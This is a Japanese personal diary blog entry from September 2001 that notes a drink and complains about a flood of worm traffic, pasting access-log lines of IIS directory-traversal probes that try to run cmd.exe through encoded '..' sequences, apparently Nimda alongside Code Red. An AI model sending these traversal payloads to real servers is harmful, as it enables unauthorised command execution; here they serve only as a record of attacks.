酒日記 2001 09 17

Mon, 17 Sep 2001

■ 秋味 (6% × 1000 ml)

今日午後10時過ぎから、変なアクセスが急増。

63.149.*.* - - [19/Sep/2001:04:09:53 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:54 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:54 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:55 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:55 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:56 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:57 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:57 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:58 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:58 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:59 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:59 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
63.149.*.* - - [19/Sep/2001:04:10:00 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-"
63.149.*.* - - [19/Sep/2001:04:10:00 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-"
63.149.*.* - - [19/Sep/2001:04:10:01 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
63.149.*.* - - [19/Sep/2001:04:10:01 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"

こんなログを残す。IIS を狙ったもののようだが。ほぼ数分おきにやってくるのでウザイったらもう。

調べてみるとどうやら、CERT/CC Current Activity で警告されてるものらしい。いやはや。それに混じって時折 Code Red もやってくるし。うち (sake-nikki.dyndns.org) へのアクセスの大半がワームってどういうことよ(笑)

2021年 6月
日	月	火	水	木	金	土
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

2021年 6月
日	月	火	水	木	金	土
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

2021年 6月
日	月	火	水	木	金	土
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

2021年 6月
日	月	火	水	木	金	土
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30